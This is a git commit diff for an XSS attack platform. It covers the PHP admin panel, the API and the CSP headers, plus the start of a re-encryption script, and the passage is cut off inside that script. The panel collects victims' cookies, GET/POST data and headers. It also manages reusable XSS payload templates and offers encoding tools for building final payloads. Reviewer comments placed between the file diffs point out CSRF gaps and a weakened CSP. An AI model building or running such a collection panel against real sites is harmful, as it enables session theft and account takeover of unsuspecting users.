Version 3.0.0

1. 完成js模板,我的js模块,可以直接添加修改用于xss的js
2. 采用ace编辑器实现js代码高亮与错误检测
3. 使用js_beautify实现js代码格式化,使用jsmin实现js代码压缩
4. 整合xss'or工具部分功能,自由编码,方便生成最终的payload
5. 增加加密方式RC4,更改默认加密方式为RC4
6. 从旧版本升级并想保留记录的请务必查看Readme里的升级步骤
7. 修复一系列bug
firesun
2016-01-24 01:07:17 +08:00
parent f5ab50bb89
commit 264460650b
73 changed files with 6487 additions and 1177 deletions

516
admin.php

@@ -6,39 +6,19 @@ require("auth.php");
<html>
<head>
<meta charset="utf-8" />
<title>控制面板</title>
<link rel="stylesheet" href="static/css/bootstrap.min.css" type="text/css" />
<link rel="stylesheet" href="static/css/Site.css" type="text/css" />
<link rel="stylesheet" href="static/css/notification.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.base.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.office.css" type="text/css" />
<link rel="stylesheet" href="static/css/animate.css" type="text/css" />
<script type="text/javascript" src="static/js/jquery.min.js"></script>
<script type="text/javascript" src="static/js/bootstrap.min.js"></script>
<script type="text/javascript" src="static/js/jquery-ui.min.js"></script>
<script type="text/javascript" src="static/js/notification.js"></script>
<script type="text/javascript" src="static/js/localization.js"></script>
<script type="text/javascript" src="static/js/jqxcore.js"></script>
<script type="text/javascript" src="static/js/jqxdata.js"></script>
<script type="text/javascript" src="static/js/jqxbuttons.js"></script>
<script type="text/javascript" src="static/js/jqxscrollbar.js"></script>
<script type="text/javascript" src="static/js/jqxmenu.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.selection.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.edit.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.sort.js"></script>
<script type="text/javascript" src="static/js/jqxtabs.js"></script>
<script type="text/javascript" src="static/js/getTheme.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.columnsresize.js"></script>
<script type="text/javascript" src="static/js/jqxwindow.js"></script>
<script type="text/javascript" src="static/js/jqxdropdownlist.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.pager.js"></script>
<script type="text/javascript" src="static/js/jqxlistbox.js"></script>
<script type="text/javascript" src="static/js/loadgrid.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.filter.js"></script>
<meta charset="utf-8" />
<title>控制面板</title>
<link rel="stylesheet" href="static/css/bootstrap.min.css" type="text/css" />
<link rel="stylesheet" href="static/css/main.css" type="text/css" />
<link rel="stylesheet" href="static/css/notification.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.base.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.office.css" type="text/css" />
<link rel="stylesheet" href="static/css/animate.css" type="text/css" />
</head>
<body>
@@ -57,189 +37,375 @@ require("auth.php");
<div class="collapse navbar-collapse" id="sidebar-nav" role="navigation">
<ul id="Tab" class="nav">
<li class="active">
<a href="#panel" data-toggle="tab">
<a id="xss_panel_tab" href="#panel" data-toggle="tab">
<span class="icon icon-panel"></span>接收面板</a>
</li>
<li>
<a href="#js" data-toggle="tab">
<a id="my_js_tab" href="#js" data-toggle="tab">
<span class="icon icon-my-js"></span>我的JS</a>
</li>
<li>
<a href="#template" data-toggle="tab">
<a id="js_template_tab" href="#template" data-toggle="tab">
<span class="icon icon-template"></span>公共模板</a>
</li>
<li>
<a href="#aboutus" data-toggle="tab">
<a id="about_us_tab" href="#aboutus" data-toggle="tab">
<span class="icon icon-info"></span>关于</a>
</li>
<li id="logout">
<a href="#logout" >
<span class="icon icon-logout"></span>注销</a>
<li id="logout">
<a href="#logout">
<span class="icon icon-logout"></span>注销</a>
</li>
</ul>
<span id="rights">Copyright © 2015-2016<br>Powered by <a href="http://firesun.me" target="_blank">Firesun</a></span>
<span id="rights">Copyright © 2015-2016<br>Powered by <a href="http://www.firesun.me" target="_blank">Firesun</a></span>
</div>
</div>
<div class="tab-content">
<div id="panel" class="tab-pane active main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">XSS接收面板</h2>
<div style="clear:both;"></div>
</div>
<div id="panelGrid"></div>
</div>
<div id="js" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">我的js</h2>
<div style="clear:both;"></div>
</div>
<div id="myJS"></div>
</div>
<div id="template" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">js模板</h2>
<div style="clear:both;"></div>
</div>
<div id="jsTemplate"></div>
</div>
<div id="aboutus" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">关于</h2>
<div style="clear:both;"></div>
</div>
<div id="about_detail">
</div>
</div>
</div>
</div>
</div>
<div id="notifications-bottom-right"></div>
<div style="display: none;">
<div id="searchWindow" class="windows">
<div>
查找记录</div>
<div style="overflow: hidden;">
<div>
关键字:</div>
<div style='margin-top:5px;'>
<input id='inputField' type="text" class="jqx-input" style="width: 200px; height: 23px;" />
</div>
<div style="margin-top: 7px; clear: both;">
列名:</div>
<div style='margin-top:5px;'>
<div id='dropdownlist'>
</div>
</div>
<div>
<input type="button" style='margin-top: 15px; margin-left: 50px; float: left;' value="查找" id="findButton" />
<input type="button" style='margin-left: 5px; margin-top: 15px; float: left;' value="清除" id="clearButton" />
</div>
</div>
</div>
<div id="deleteConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" />
确认</div>
<div>
<div style="margin: 5px;">
您确认执行删除操作么?
<div class="tab-content">
<div id="panel" class="tab-pane active main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">XSS接收面板</h2>
<div class="clear"></div>
</div>
<div>
<div style="float: right; margin-top: 15px;">
<input type="button" id="deleteConfirm_ok" value="确认" style="margin-right: 10px" />
<input type="button" id="deleteConfirm_cancel" value="取消" />
<div id="panelGrid"></div>
</div>
<div id="js" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">我的js</h2>
<div class="clear"></div>
</div>
<div id="myJS">
<div id="myJS_splitter">
<div class="overflow-hidden" >
<div class="listbox" id="myJS_listbox">
</div>
<div id="myJS_listbox_toolbar" class="overflow-hidden listbox_toolbar">
<div id="myJS_add_button"><img class="listbox_toolbar_button_icon" src='static/images/add.png' /><span class="listbox_toolbar_button_span">添加</span></div>
<div id="myJS_del_button"><img class="listbox_toolbar_button_icon" src='static/images/delete.png' /><span class="listbox_toolbar_button_span">删除</span></div>
<div id="myJS_clear_button"><img class="listbox_toolbar_button_icon" src='static/images/clear.png' /><span class="listbox_toolbar_button_span">清空</span></div>
</div>
</div>
<div class="overflow-hidden" id="myJS_ContentPanel">
<div class="js_content_panel">
<form id="myJS_form">
<div class="js_content_div">
<span>文件名:</span>
<input id="myJS_name" />.js
</div>
<div class="js_content_div">
<div>模板说明:</div>
<textarea id="myJS_description" ></textarea>
</div>
<div class="editor">
<div id="myJS_content_toolBar" ></div>
<div id="myJS_content" ></div>
</div>
<div class="js_content_button_div">
<button id="myJS_ok" type="button">新增</button>
<button id="myJS_cancel" type="button">重置</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="logoutConfirmWindow" class="windows">
<div id="template" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">js模板</h2>
<div class="clear"></div>
</div>
<div id="jsTemplate">
<div id="jsTemplate_splitter">
<div class="overflow-hidden" >
<div class="listbox" id="jsTemplate_listbox">
</div>
<div id="jsTemplate_listbox_toolbar" class="overflow-hidden listbox_toolbar">
<div id="jsTemplate_add_button"><img class="listbox_toolbar_button_icon" src='static/images/add.png' /><span class="listbox_toolbar_button_span">添加</span></div>
<div id="jsTemplate_del_button"><img class="listbox_toolbar_button_icon" src='static/images/delete.png' /><span class="listbox_toolbar_button_span">删除</span></div>
<div id="jsTemplate_clear_button"><img class="listbox_toolbar_button_icon" src='static/images/clear.png' /><span class="listbox_toolbar_button_span">清空</span></div>
</div>
</div>
<div class="overflow-hidden" id="jsTemplate_ContentPanel">
<div class="js_content_panel">
<form id="jsTemplate_form">
<div class="js_content_div">
<span>文件名:</span>
<input id="jsTemplate_name" />.js
</div>
<div class="js_content_div">
<div>模板说明:</div>
<textarea id="jsTemplate_description"></textarea>
</div>
<div class="editor">
<div id="jsTemplate_content_toolBar" ></div>
<div id="jsTemplate_content" ></div>
</div>
<div class="js_content_button_div">
<button id="jsTemplate_ok" type="button">新增</button>
<button id="jsTemplate_cancel" type="button">重置</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div id="aboutus" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">关于</h2>
<div class="clear" ></div>
</div>
<div id="about_detail" >
<section id="about_us_banner" style="background-position: 50% 0px;">
<div id="firesun" class="content">
<header class="header">
<h2>火日攻天@firesun</h2>
<p>蓝莲花战队负责端茶送水的<br>邮箱:<a href="mailto:firesun.cn@gmail.com">firesun.cn@gmail.com</a><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;主页:<a href="http://www.firesun.me/" target="_blank_">http://www.firesun.me/</a></p>
</header>
<span class="image"><img class="img" src="static/images/avatar.png"></span>
</div>
<div ></div >
<div class="content">
<header class="header">
<h2>蓝莲花战队</h2>
<p>源自清华大学的网安技术竞赛与研究团队<br>中国CTF竞赛成绩最突出的国际知名战队<br>
主页:<a href="http://www.blue-lotus.net/" target="_blank_">http://www.blue-lotus.net/</a></p>
</header>
<span class="logoimage"><img class="logoimg" src="static/images/bluelotus.png"></span>
</div>
</section>
</div>
</div>
</div>
</div>
</div>
<div id="notifications-bottom-right"></div>
<div id="tip-windows" class="display-none">
<div id="xssorWindow" class="windows">
<div id="Ww_B_0" class="Ww_B">
<div id="Ww_B_0_Left">
<textarea id="Ww_B_0_textarea"></textarea>
</div>
<div id="Ww_B_0_Right">
<input type="button" id="rwb_b2" value="→16en" />
<input type="button" id="rwb_b2_j" value="De" />
<input type="radio" name="rwb_b2_c" id="rwb_b2_c1" checked="checked" />\u<input type="radio" name="rwb_b2_c" id="rwb_b2_c2" />&amp;#x;<br />
<input type="button" id="rwb_b1" value="→10en" /> <input type="button" id="rwb_b1_j" value="De" />
<input type="radio" name="rwb_b1_c" id="rwb_b1_c1" checked="checked" />,<input type="radio" name="rwb_b1_c" id="rwb_b1_c4" />c<input type="radio" name="rwb_b1_c" id="rwb_b1_c2" />&amp;#<input type="radio" name="rwb_b1_c" id="rwb_b1_c3" />&amp;#;
<br />
<input type="button" id="rwb_b3" value="escape" /> <span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b3j" value="unescape" />
<br />
<input type="button" id="rwb_b4" value="encodeURI" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b4j" value="decodeURI" />
<br />
<input type="button" id="rwb_b5" value="Html2JS" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b5j" value="JS2Html" />
<br />
<input type="button" id="rwb_b6" value="HtmlEncode" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b6j" value="HtmlDecode" />
<br />
<input type="button" id="rwb_b7" value="base64En" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b7j" value="base64De" />
<br /><br />
<input type="button" id="rwb_b8" value="replace" />
<input type="text" name="oldC" id="oldC" size="5" />
<span style="font-size:18px">&rarr;</span>
<input type="text" name="newC" id="newC" size="5" />
<br /><br />
</div>
</div>
</div>
<div id="searchWindow" class="windows">
<div>
查找记录</div>
<div class="overflow-hidden">
<div>
关键字:</div>
<div class="search_input_field">
<input id='search_input_field' type="text" class="jqx-input" />
</div>
<div class="search_div">
列名:</div>
<div class="dropdownlist">
<div id='dropdownlist'>
</div>
</div>
<div>
<input type="button" value="查找" id="findButton" />
<input type="button" value="清除" id="clearButton" />
</div>
</div>
</div>
<div id="deleteConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" /> 确认
</div>
<div>
<div class="windows-tip-div">
您确认执行删除操作吗?
</div>
<div>
<div class="windows-button-div">
<input type="button" id="deleteConfirm_ok" value="确认" class="windows-button" />
<input type="button" id="deleteConfirm_cancel" value="取消" />
</div>
</div>
</div>
</div>
<div id="logoutConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" />
确认</div>
<div>
<div style="margin: 5px;">
<div class="windows-tip-div">
您确认注销吗?
</div>
<div>
<div style="float: right; margin-top: 15px;">
<input type="button" id="logoutConfirm_ok" value="确认" style="margin-right: 10px" />
<div class="windows-button-div">
<input type="button" id="logoutConfirm_ok" value="确认" class="windows-button" />
<input type="button" id="logoutConfirm_cancel" value="取消" />
</div>
</div>
</div>
</div>
<div id="clearConfirmWindow" class="windows">
<div id="clearConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" /> 确认
</div>
<div>
<div class="windows-tip-div">
您确认清空所有记录吗?
</div>
<div>
<img width="14" height="14" src="static/images/help.png" alt="" />
确认</div>
<div>
<div style="margin: 5px;">
您确认清空所有记录么?
</div>
<div>
<div style="float: right; margin-top: 15px;">
<input type="button" id="clearConfirm_ok" value="确认" style="margin-right: 10px" />
<div class="windows-button-div">
<input type="button" id="clearConfirm_ok" value="确认" class="windows-button" />
<input type="button" id="clearConfirm_cancel" value="取消" />
</div>
</div>
</div>
</div>
<div id="failedWindow" class="windows">
</div>
</div>
<div id="failedWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/close.png" alt="" /> 失败
</div>
<div>
<div class="windows-tip-div">
操作失败!
</div>
<div>
<img width="14" height="14" src="static/images/close.png" alt="" />
失败</div>
<div>
<div style="margin: 5px;">
操作失败!
</div>
<div>
<div style="float: right; margin-top: 15px;">
<div class="windows-button-div">
<input type="button" id="failed_ok" value="确认" />
</div>
</div>
</div>
</div>
</div >
<script id="xss-detail-template" type="text/template">
<div style='margin: 10px;'>
<ul style='margin-left: 30px;'>
<li>GET</li>
<li>POST</li>
<li>Cookie</li>
<li>HTTP请求信息</li>
<li>其他信息</li>
</ul>
<div class='get_grid'></div>
<div class='post_grid'></div>
<div class='cookie_grid'></div>
<div class='headers_grid'></div>
<div class='information'></div>
</div>
</script>
</div>
</div>
</div>
<!-- xss记录detail面板写成script的加载速度比div快-->
<script id="xss-detail-template" type="text/template">
<div style='margin: 10px;'>
<ul style='margin-left: 30px;'>
<li>GET</li>
<li>POST</li>
<li>Cookie</li>
<li>HTTP请求信息</li>
<li>其他信息</li>
</ul>
<div class='get_grid'></div>
<div class='post_grid'></div>
<div class='cookie_grid'></div>
<div class='headers_grid'></div>
<div class='information'></div>
</div>
</script>
<script type="text/javascript" src="static/js/jquery.min.js"></script>
<script type="text/javascript" src="static/js/jquery-ui.min.js"></script>
<script type="text/javascript" src="static/js/bootstrap.min.js"></script>
<script type="text/javascript" src="static/js/beautify.js"></script>
<script type="text/javascript" src="static/js/ZeroClipboard.min.js"></script>
<script type="text/javascript" src="static/js/ace.js"></script>
<script type="text/javascript" src="static/js/jsmin.js"></script>
<script type="text/javascript" src="static/js/js_encode.js"></script>
<script type="text/javascript" src="static/js/jqxcore.js"></script>
<script type="text/javascript" src="static/js/jqxdata.js"></script>
<script type="text/javascript" src="static/js/jqxbuttons.js"></script>
<script type="text/javascript" src="static/js/jqxscrollbar.js"></script>
<script type="text/javascript" src="static/js/jqxmenu.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.selection.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.edit.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.sort.js"></script>
<script type="text/javascript" src="static/js/jqxtabs.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.columnsresize.js"></script>
<script type="text/javascript" src="static/js/jqxwindow.js"></script>
<script type="text/javascript" src="static/js/jqxdropdownlist.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.pager.js"></script>
<script type="text/javascript" src="static/js/jqxlistbox.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.filter.js"></script>
<script type="text/javascript" src="static/js/jqxsplitter.js"></script>
<script type="text/javascript" src="static/js/jqxtoolbar.js"></script>
<script type="text/javascript" src="static/js/jqxcombobox.js"></script>
<script type="text/javascript" src="static/js/jqxinput.js"></script>
<script type="text/javascript" src="static/js/jqxtextarea.js"></script>
<script type="text/javascript" src="static/js/getTheme.js"></script>
<script type="text/javascript" src="static/js/localization.js"></script>
<script type="text/javascript" src="static/js/loadxsspanel.js"></script>
<script type="text/javascript" src="static/js/loadjstemplate.js"></script>
<script type="text/javascript" src="static/js/loadmyjs.js"></script>
<script type="text/javascript" src="static/js/notification.js"></script>
</body>
</html>
</html>
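Review bot: The two links added in the About panel use `target="_blank_"`, which is a window name rather than the `_blank` keyword, and neither they nor the footer link to firesun.me carry a `rel` attribute. On older browsers the opened site gets a `window.opener` handle back to the admin panel, and the panel's URL is sent in the Referer header. Suggest `target="_blank" rel="noopener noreferrer"` on all three links. The section also keeps a few `style="…"` attributes (on `#about_us_banner` and the `&harr;` spans) although most inline styles were moved to classes; moving the rest would be a step towards dropping `'unsafe-inline'` from `style-src`.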

256
api.php

@@ -5,76 +5,280 @@ require_once("functions.php");
require_once("config.php");
require_once("dio.php");
header('Content-Type: application/json');
//时间戳的正则表达式
define('ID_REGEX', '/^[0-9]{10}$/');
//合法文件名的正则表达式
define('FILE_REGEX', '/(?!((^(con)$)|^(con)\..*|(^(prn)$)|^(prn)\..*|(^(aux)$)|^(aux)\..*|(^(nul)$)|^(nul)\..*|(^(com)[1-9]$)|^(com)[1-9]\..*|(^(lpt)[1-9]$)|^(lpt)[1-9]\..*)|^\s+|.*\s$)(^[^\/\\\:\*\?\"\<\>\|]{1,255}$)/');
//与xss记录相关api
if(isset($_GET['cmd']))
{
switch($_GET['cmd'])
{
//所有记录包括详细信息
//获取所有记录包括详细信息
case 'list':
echo json_encode(dirList());
echo json_encode(xss_record_detail_list());
break;
//只列出时间戳索引id
case 'simplelist':
echo json_encode(dirSimpleList());
//只获取时间戳索引id
case 'id_list':
echo json_encode(xss_record_id_list());
break;
//根据时间戳索引id获得单条信息
case 'get':
if(isset($_GET['id'])&&preg_match('/^[0-9]{10}$/',$_GET['id']))
echo json_encode(loadInfo($_GET['id']));
if(isset($_GET['id'])&&preg_match(ID_REGEX,$_GET['id']))
echo json_encode(load_xss_record($_GET['id']));
else
echo json_encode(false);
break;
//根据时间戳索引id删除单条信息
case 'del':
if(isset($_GET['id'])&&preg_match('/^[0-9]{10}$/',$_GET['id']))
echo json_encode(delInfo($_GET['id']));
if(isset($_GET['id'])&&preg_match(ID_REGEX,$_GET['id']))
echo json_encode(delete_xss_record($_GET['id']));
else
echo json_encode(false);
break;
//清空记录
case 'clear':
echo json_encode(clearInfo());
echo json_encode(clear_xss_record());
break;
default:
echo json_encode(false);
}
}
//与js模板相关api
else if(isset($_GET['js_template_cmd']))
{
switch($_GET['js_template_cmd'])
{
//获取所有js模板的名字与描述
case 'list':
echo json_encode(js_name_and_desc_list(JS_TEMPLATE_PATH));
break;
//添加js模板
case 'add':
if(isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(JS_TEMPLATE_PATH))
echo json_encode(false);
else
{
save_js_desc(JS_TEMPLATE_PATH,$_POST['desc'],$_POST['name']);
save_js_content(JS_TEMPLATE_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//修改js模板
case 'modify':
if(isset($_POST['old_name'])&&isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['old_name'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(JS_TEMPLATE_PATH))
echo json_encode(false);
else
{
if($_POST['old_name']!=$_POST['name'])
delete_js(JS_TEMPLATE_PATH,$_POST['old_name']);
save_js_desc(JS_TEMPLATE_PATH,$_POST['desc'],$_POST['name']);
save_js_content(JS_TEMPLATE_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//获取某一js模板的内容
case 'get':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(load_js_content(JS_TEMPLATE_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//删除js模板
case 'del':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(delete_js(JS_TEMPLATE_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//清空js模板
case 'clear':
echo json_encode(clear_js(JS_TEMPLATE_PATH));
break;
default:
echo json_encode(false);
}
}
//与我的js相关api
else if(isset($_GET['my_js_cmd']))
{
switch($_GET['my_js_cmd'])
{
//获取所有我的js的名字与描述
case 'list':
echo json_encode(js_name_and_desc_list(MY_JS_PATH));
break;
//添加js模板
case 'add':
if(isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(MY_JS_PATH))
echo json_encode(false);
else
{
save_js_desc(MY_JS_PATH,$_POST['desc'],$_POST['name']);
save_js_content(MY_JS_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//修改js模板
case 'modify':
if(isset($_POST['old_name'])&&isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['old_name'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(MY_JS_PATH))
echo json_encode(false);
else
{
if($_POST['old_name']!=$_POST['name'])
delete_js(MY_JS_PATH,$_POST['old_name']);
save_js_desc(MY_JS_PATH,$_POST['desc'],$_POST['name']);
save_js_content(MY_JS_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//获取某一js模板的内容
case 'get':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(load_js_content(MY_JS_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//删除js模板
case 'del':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(delete_js(MY_JS_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//清空js模板
case 'clear':
echo json_encode(clear_js(MY_JS_PATH));
break;
default:
echo json_encode(false);
}
}
else
echo json_encode(false);
function dirSimpleList() {
function xss_record_id_list() {
$files = glob(DATA_PATH . '/*.php');
foreach ($files as &$file){
$file=basename($file,".php");
$list=array();
foreach ($files as $file){
$filename=basename($file,".php");
if( preg_match(ID_REGEX, $filename) )
$list[]=$filename;
}
return $files;
return $list;
}
function dirList() {
function xss_record_detail_list() {
$list=array();
$files = glob(DATA_PATH . '/*.php');
arsort($files);
foreach ($files as $file) {
$filename=basename($file,".php");
$info=loadInfo($filename);
$isChange=false;
//如果没有设置location就查询qqwry.dat判断location
if(!isset($info['location']))
if( preg_match(ID_REGEX, $filename) )
{
$info['location']=convertip($info['user_IP'],IPDATA_PATH);
$isChange=true;
$info=load_xss_record($filename);
if($info===false)
continue;
$isChange=false;
//如果没有设置location就查询qqwry.dat判断location
if(!isset($info['location']))
{
$info['location']=stripStr( convertip($info['user_IP'],IPDATA_PATH) );
$isChange=true;
}
if($isChange)
save_xss_record(json_encode($info),$filename);
$list[]= $info;
}
if($isChange)
saveInfo(json_encode($info),$filename);
$list[]= $info;
}
return $list;
}
//获取js的名字与描述列表
function js_name_and_desc_list($path)
{
$list=array();
$files = glob($path . '/*.js');
arsort($files);
foreach ($files as $file){
//由于可能有中文名,故使用正则来提取文件名
$item=array();
$item['js_uri']=$file;
$filename=preg_replace('/^.+[\\\\\\/]/', '', $file);
$filename=substr ( $filename , 0 , strlen ($filename)-3 );
$item['js_name']=$filename;
$item['js_name_abbr']=stripStr($filename);
$result=@file_get_contents(dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc');
$result=$result?$result:"";
$result=decrypt($result);
if(json_encode($result)===false)
$result="加密密码不符,无法获得描述";
$item['js_description']=$result;
$item['js_description_abbr']=stripStr($result);
//特别注意只有js_name_abbrjs_description_abbr经过stripStr处理
$list[]= $item;
}
return $list;
}
?>
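Review bot: The destructive `del` and `clear` branches of `cmd`, `js_template_cmd` and `my_js_cmd` act on `$_GET` alone, and `add`/`modify` accept `$_POST` with no anti-CSRF token in the visible code, so a cross-site request from a logged-in administrator's browser would be honoured unless a check exists in a file not shown here. I would restrict every state-changing command to POST and compare a per-session token before the `switch`, e.g. `if($_SERVER['REQUEST_METHOD']!=='POST' || !hash_equals($_SESSION['csrf_token'], (string)$_POST['csrf_token'])) { echo json_encode(false); exit; }` (`csrf_token` is a placeholder name). Separately, `add` and `modify` discard whatever `save_js_desc()`/`save_js_content()` return and always answer `true`, and `modify` deletes `old_name` before the new files are written; assuming the helpers report failure the way `save_xss_record()` does, check both results and delete the old file only after the writes succeed. `FILE_REGEX` also tests the reserved device names in lower case only, so adding the `i` modifier would cover `CON`, `Nul` and similar.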


@@ -20,8 +20,8 @@ if(!(isset($_SESSION['isLogin']) && $_SESSION['isLogin']===true && isset($_SESSI
}
//开启CSP
header("Content-Security-Policy: default-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline'; frame-src 'none'");
header("X-Content-Security-Policy: default-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline'; frame-src 'none'");
header("X-WebKit-CSP: default-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline'; frame-src 'none'");
header("Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-src 'none'");
header("X-Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-src 'none'");
header("X-WebKit-CSP: default-src 'self'; style-src 'self' 'unsafe-inline';img-src 'self' data:; frame-src 'none'");
?>
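Review bot: Dropping `object-src 'none'` from all three headers means plugin content now falls back to `default-src 'self'`, so same-origin `<object>`/`<embed>` resources are allowed on a panel that renders captured, attacker-influenced data. If the relaxation is only needed for the ZeroClipboard script that admin.php now loads (an inference; the commit does not state the reason), record that in a comment and write it explicitly as `object-src 'self'`; otherwise keep `object-src 'none'`. The `X-WebKit-CSP` line is also missing the space after `'unsafe-inline';`, which is harmless but differs from the other two headers.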

150
change_encrypt_pass.php Normal file

@@ -0,0 +1,150 @@
<?php
//本文件未鉴权,安全起见默认禁用此php文件,需要时自行注释exit()
exit();
/*
* 当修改config.php里的加密方式或者加密密码时,可用此文件来重新加密xss记录,js的描述,ip封禁列表
* 请在修改加密方式或者加密密码后执行此文件(如果选择不加密,加密密码写任意值)
* 用法:
* php change_encrypt_pass.php (以前是否加密true/false) (旧加密密码) (旧加密方法AES/RC4) (现在是否加密) (新加密密码) (新加密方法)
* 举例
* php change_encrypt_pass.php true bluelotus AES true bluelotus RC4
* php change_encrypt_pass.php true bluelotus AES false xxxx(任意值) AES
*/
/*
* 从旧版本升级的方法
* 1. php change_encrypt_pass.php update (以前是否加密true/false) (旧加密密码)
* 此时所有xss记录转化为加密开启密码bluelotus加密方法RC4
* 2. 修改config.php修改加密开关新密码加密方式
* 3. php change_encrypt_pass.php true bluelotus rc4 (现在是否加密) (新加密密码) (新加密方法)
* 4. 升级完成
*/
define("IN_XSS_PLATFORM",true);
require_once("config.php");
if($argv[1]==="update")
update_from_old_version($argv[2],$argv[3]);
else
change_pass($argv[1],$argv[2],$argv[3],$argv[4],$argv[5],$argv[6]);
function update_from_old_version($old_enable_encrypt,$old_encrypt_pass){
//如果从旧版本升级就统一先切换为RC4密码bluelotus
modify_ForbiddenIPList($old_enable_encrypt,$old_encrypt_pass,"AES","true","bluelotus", "RC4");
modify_xss_record($old_enable_encrypt,$old_encrypt_pass,"AES","true","bluelotus","RC4");
}
function change_pass($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
modify_ForbiddenIPList($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
modify_xss_record($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
modify_js_desc(MY_JS_PATH,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
modify_js_desc(JS_TEMPLATE_PATH,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
}
function modify_ForbiddenIPList($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
$logfile = DATA_PATH . '/forbiddenIPList.dat';
$str = @file_get_contents( $logfile );
if($str===false)
return;
$str=decrypt($str,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type);
$str=encrypt($str, $new_enable_encrypt, $new_encrypt_pass, $new_encrypt_type);
if(@file_put_contents($logfile, $str))
echo "修改封禁ip成功\n";
else
echo "修改封禁ip失败可能是没有权限chmod 777\n";
}
function modify_xss_record($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
$files = glob(DATA_PATH . '/*.php');
foreach ($files as $file) {
$filename=basename($file,".php");
if( preg_match("/^[0-9]{10}$/", $filename) )
{
